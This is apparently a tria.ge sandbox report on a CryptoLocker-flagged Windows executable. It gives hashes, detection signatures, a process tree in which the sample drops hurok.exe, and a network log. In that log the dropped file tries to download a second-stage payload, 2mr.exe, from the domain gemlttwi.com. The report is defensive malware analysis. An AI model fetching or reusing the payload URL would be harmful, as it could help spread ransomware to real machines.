Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

2024-04-30...er.exe

windows7-x64

9

2024-04-30...er.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    93s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/04/2024, 20:12 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-04-30_be2b1853ab8dbafe435ee69bd931aa2d_cryptolocker.exe

  • Size

    51KB

  • MD5

    be2b1853ab8dbafe435ee69bd931aa2d

  • SHA1

    59164d95b334a70846afd684d1f7c0f4a7159e7e

  • SHA256

    8f23c7ea0813b5cbc064d5dad2a372639fc92867950bd14d1b664462c886e41b

  • SHA512

    9889d7f774ac7f0fb1c40fb813e62d99f3beef480b24fc26c21a885aa650a906901d738aab900a3daf98859b4265ab9757de1b8ee6210f198803999d3227f8c2

  • SSDEEP

    1536:o1KhxqwtdgI2MyzNORQtOflIwoHNV2XBFV72BOlA7ZszsbKY1xzpAIUr:aq7tdgI2MyzNORQtOflIwoHNV2XBFV7L

Score
9/10

Malware Config

Signatures

  • Detection of CryptoLocker Variants 1 IoCs
  • Detection of Cryptolocker Samples 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-04-30_be2b1853ab8dbafe435ee69bd931aa2d_cryptolocker.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-04-30_be2b1853ab8dbafe435ee69bd931aa2d_cryptolocker.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4740
    • C:\Users\Admin\AppData\Local\Temp\hurok.exe
      "C:\Users\Admin\AppData\Local\Temp\hurok.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      PID:2556

Network

  • flag-us
    DNS
    gemlttwi.com
    hurok.exe
    Remote address:
    8.8.8.8:53
    Request
    gemlttwi.com
    IN A
    Response
    gemlttwi.com
    IN A
    192.185.35.56
  • flag-us
    GET
    https://gemlttwi.com/tech/2mr.exe
    hurok.exe
    Remote address:
    192.185.35.56:443
    Request
    GET /tech/2mr.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: gemlttwi.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Date: Tue, 30 Apr 2024 20:12:28 GMT
    Server: Apache
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <https://gemlttwi.com/wp-json/>; rel="https://api.w.org/"
    Upgrade: h2,h2c
    Connection: Upgrade
    Vary: Accept-Encoding
    X-Endurance-Cache-Level: 2
    X-nginx-cache: WordPress
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    56.35.185.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.35.185.192.in-addr.arpa
    IN PTR
    Response
    56.35.185.192.in-addr.arpa
    IN PTR
    immacbytescom
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net
    IN CNAME
    dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net
    IN A
    204.79.197.237
    dual-a-0034.a-msedge.net
    IN A
    13.107.21.237
  • flag-us
    GET
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8dC7FF0SBiDovPFPJkfSUfTVUCUzdvs-IoynTk1IaafvLZChWN9snYPs0I3r8-9ti7AyNKSHhWIGMDxY9uiSwa8h2ad_4DmedjMF-uHCemq-l8a9EOak0ORqk3n1DbFDzq8TGJHzB8ywF1eprsI4kvOBkVyHn8jy7evHswSsbfstVVH6E%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D99aeec4315351d0e05a08a68b967418e&TIME=20240426T133054Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8dC7FF0SBiDovPFPJkfSUfTVUCUzdvs-IoynTk1IaafvLZChWN9snYPs0I3r8-9ti7AyNKSHhWIGMDxY9uiSwa8h2ad_4DmedjMF-uHCemq-l8a9EOak0ORqk3n1DbFDzq8TGJHzB8ywF1eprsI4kvOBkVyHn8jy7evHswSsbfstVVH6E%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D99aeec4315351d0e05a08a68b967418e&TIME=20240426T133054Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4 HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=1B755AE45DD5657B2C0D4E955C6E64AA; domain=.bing.com; expires=Sun, 25-May-2025 20:12:28 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 221348F076E3495DB434F498AD4EDC88 Ref B: LON04EDGE0816 Ref C: 2024-04-30T20:12:28Z
    date: Tue, 30 Apr 2024 20:12:28 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8dC7FF0SBiDovPFPJkfSUfTVUCUzdvs-IoynTk1IaafvLZChWN9snYPs0I3r8-9ti7AyNKSHhWIGMDxY9uiSwa8h2ad_4DmedjMF-uHCemq-l8a9EOak0ORqk3n1DbFDzq8TGJHzB8ywF1eprsI4kvOBkVyHn8jy7evHswSsbfstVVH6E%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D99aeec4315351d0e05a08a68b967418e&TIME=20240426T133054Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8dC7FF0SBiDovPFPJkfSUfTVUCUzdvs-IoynTk1IaafvLZChWN9snYPs0I3r8-9ti7AyNKSHhWIGMDxY9uiSwa8h2ad_4DmedjMF-uHCemq-l8a9EOak0ORqk3n1DbFDzq8TGJHzB8ywF1eprsI4kvOBkVyHn8jy7evHswSsbfstVVH6E%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D99aeec4315351d0e05a08a68b967418e&TIME=20240426T133054Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4 HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=1B755AE45DD5657B2C0D4E955C6E64AA; _EDGE_S=SID=173D948078D06BE7275280F179106A0F
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=HB2uR2yG0RN_eFjvYPyv2h8yb7jWJFl0plY6IVIdYLw; domain=.bing.com; expires=Sun, 25-May-2025 20:12:29 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 9AC53F07B3B64850BD49FDA0F7C4A7EA Ref B: LON04EDGE0816 Ref C: 2024-04-30T20:12:29Z
    date: Tue, 30 Apr 2024 20:12:28 GMT
  • flag-nl
    GET
    https://www.bing.com/aes/c.gif?RG=98286c894c3248b89c500606d9064ea9&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T133054Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644
    Remote address:
    23.62.61.89:443
    Request
    GET /aes/c.gif?RG=98286c894c3248b89c500606d9064ea9&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T133054Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644 HTTP/2.0
    host: www.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=1B755AE45DD5657B2C0D4E955C6E64AA
    Response
    HTTP/2.0 200
    cache-control: private,no-store
    pragma: no-cache
    vary: Origin
    p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: C1DB8F5814AD4C899789192A7CC802C7 Ref B: DUS30EDGE0407 Ref C: 2024-04-30T20:12:29Z
    content-length: 0
    date: Tue, 30 Apr 2024 20:12:29 GMT
    set-cookie: _EDGE_S=SID=173D948078D06BE7275280F179106A0F; path=/; httponly; domain=bing.com
    set-cookie: MUIDB=1B755AE45DD5657B2C0D4E955C6E64AA; path=/; httponly; expires=Sun, 25-May-2025 20:12:29 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.553d3e17.1714507948.2fe829bf
  • flag-us
    DNS
    11.97.55.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.97.55.23.in-addr.arpa
    IN PTR
    Response
    11.97.55.23.in-addr.arpa
    IN PTR
    a23-55-97-11deploystaticakamaitechnologiescom
  • flag-us
    DNS
    73.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.190.18.2.in-addr.arpa
    IN PTR
    Response
    73.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-73deploystaticakamaitechnologiescom
  • flag-us
    DNS
    237.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    237.197.79.204.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    89.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    89.61.62.23.in-addr.arpa
    IN PTR
    Response
    89.61.62.23.in-addr.arpa
    IN PTR
    a23-62-61-89deploystaticakamaitechnologiescom
  • flag-us
    DNS
    134.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    134.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-nl
    GET
    https://www.bing.com/th?id=OADD2.10239381793954_1BHQ1BWFG78XLZOQQ&pid=21.2&c=16&roil=0.0049&roit=0&roir=0.9951&roib=1&w=24&h=24&dynsize=1&qlt=90
    Remote address:
    23.62.61.89:443
    Request
    GET /th?id=OADD2.10239381793954_1BHQ1BWFG78XLZOQQ&pid=21.2&c=16&roil=0.0049&roit=0&roir=0.9951&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
    host: www.bing.com
    accept: */*
    cookie: MUID=1B755AE45DD5657B2C0D4E955C6E64AA; _EDGE_S=SID=173D948078D06BE7275280F179106A0F; MSPTC=HB2uR2yG0RN_eFjvYPyv2h8yb7jWJFl0plY6IVIdYLw; MUIDB=1B755AE45DD5657B2C0D4E955C6E64AA
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-type: image/png
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QWthbWFp
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    content-length: 1299
    date: Tue, 30 Apr 2024 20:12:31 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.553d3e17.1714507951.2fe82f5a
  • flag-us
    DNS
    88.156.103.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.156.103.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    50.23.12.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.23.12.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    219.131.50.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    219.131.50.23.in-addr.arpa
    IN PTR
    Response
    219.131.50.23.in-addr.arpa
    IN PTR
    a23-50-131-219deploystaticakamaitechnologiescom
  • flag-us
    DNS
    133.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.190.18.2.in-addr.arpa
    IN PTR
    Response
    133.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-133deploystaticakamaitechnologiescom
  • flag-us
    DNS
    29.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    29.243.111.52.in-addr.arpa
    IN PTR
    Response
  • 192.185.35.56:443
    https://gemlttwi.com/tech/2mr.exe
    tls, http
    hurok.exe
    4.4kB
     109.0kB
     87
    84

    HTTP Request

    GET https://gemlttwi.com/tech/2mr.exe

    HTTP Response

    404
  • 204.79.197.237:443
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8dC7FF0SBiDovPFPJkfSUfTVUCUzdvs-IoynTk1IaafvLZChWN9snYPs0I3r8-9ti7AyNKSHhWIGMDxY9uiSwa8h2ad_4DmedjMF-uHCemq-l8a9EOak0ORqk3n1DbFDzq8TGJHzB8ywF1eprsI4kvOBkVyHn8jy7evHswSsbfstVVH6E%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D99aeec4315351d0e05a08a68b967418e&TIME=20240426T133054Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
    tls, http2
    2.5kB
     9.0kB
     20
    17

    HTTP Request

    GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8dC7FF0SBiDovPFPJkfSUfTVUCUzdvs-IoynTk1IaafvLZChWN9snYPs0I3r8-9ti7AyNKSHhWIGMDxY9uiSwa8h2ad_4DmedjMF-uHCemq-l8a9EOak0ORqk3n1DbFDzq8TGJHzB8ywF1eprsI4kvOBkVyHn8jy7evHswSsbfstVVH6E%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D99aeec4315351d0e05a08a68b967418e&TIME=20240426T133054Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8dC7FF0SBiDovPFPJkfSUfTVUCUzdvs-IoynTk1IaafvLZChWN9snYPs0I3r8-9ti7AyNKSHhWIGMDxY9uiSwa8h2ad_4DmedjMF-uHCemq-l8a9EOak0ORqk3n1DbFDzq8TGJHzB8ywF1eprsI4kvOBkVyHn8jy7evHswSsbfstVVH6E%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D99aeec4315351d0e05a08a68b967418e&TIME=20240426T133054Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4

    HTTP Response

    204
  • 23.62.61.89:443
    https://www.bing.com/aes/c.gif?RG=98286c894c3248b89c500606d9064ea9&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T133054Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644
    tls, http2
    1.5kB
     5.4kB
     17
    12

    HTTP Request

    GET https://www.bing.com/aes/c.gif?RG=98286c894c3248b89c500606d9064ea9&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T133054Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644

    HTTP Response

    200
  • 23.62.61.89:443
    https://www.bing.com/th?id=OADD2.10239381793954_1BHQ1BWFG78XLZOQQ&pid=21.2&c=16&roil=0.0049&roit=0&roir=0.9951&roib=1&w=24&h=24&dynsize=1&qlt=90
    tls, http2
    1.7kB
     6.6kB
     18
    13

    HTTP Request

    GET https://www.bing.com/th?id=OADD2.10239381793954_1BHQ1BWFG78XLZOQQ&pid=21.2&c=16&roil=0.0049&roit=0&roir=0.9951&roib=1&w=24&h=24&dynsize=1&qlt=90

    HTTP Response

    200
  • 8.8.8.8:53
    gemlttwi.com
    dns
    hurok.exe
    58 B
     74 B
     1
    1

    DNS Request

    gemlttwi.com

    DNS Response

    192.185.35.56

  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
     90 B
     1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    56.35.185.192.in-addr.arpa
    dns
    72 B
     100 B
     1
    1

    DNS Request

    56.35.185.192.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
     151 B
     1
    1

    DNS Request

    g.bing.com

    DNS Response

    204.79.197.237
    13.107.21.237

  • 8.8.8.8:53
    11.97.55.23.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    11.97.55.23.in-addr.arpa

  • 8.8.8.8:53
    73.190.18.2.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    73.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    237.197.79.204.in-addr.arpa
    dns
    73 B
     143 B
     1
    1

    DNS Request

    237.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    89.61.62.23.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    89.61.62.23.in-addr.arpa

  • 8.8.8.8:53
    134.32.126.40.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    134.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    88.156.103.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    88.156.103.20.in-addr.arpa

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    219.131.50.23.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    219.131.50.23.in-addr.arpa

  • 8.8.8.8:53
    133.190.18.2.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    133.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    29.243.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    29.243.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\hurok.exe
    Filesize

    51KB

    MD5

    8778a7ea7a885156afa41bf71d8b7a24

    SHA1

    b4d10729d5d652d27479c5449d2bc4c963986e42

    SHA256

    e6d8f3d1812312aba7698b737210094f08231e2e19517b429c26e978ea3c3609

    SHA512

    12ebc51f8d8f0189e7c02a714440becef5b8d202634a49db5a9dec8306928d327bc92b08d9528ee86e03a404d445954821c200accc2e90494ffb5c1bdb1d6a4a

    Download Submit

  • memory/2556-25-0x0000000000560000-0x0000000000566000-memory.dmp

    Filesize

    24KB

    Download

  • memory/4740-0-0x00000000005B0000-0x00000000005B6000-memory.dmp

    Filesize

    24KB

    Download

  • memory/4740-1-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

    Download

  • memory/4740-8-0x00000000005B0000-0x00000000005B6000-memory.dmp

    Filesize

    24KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.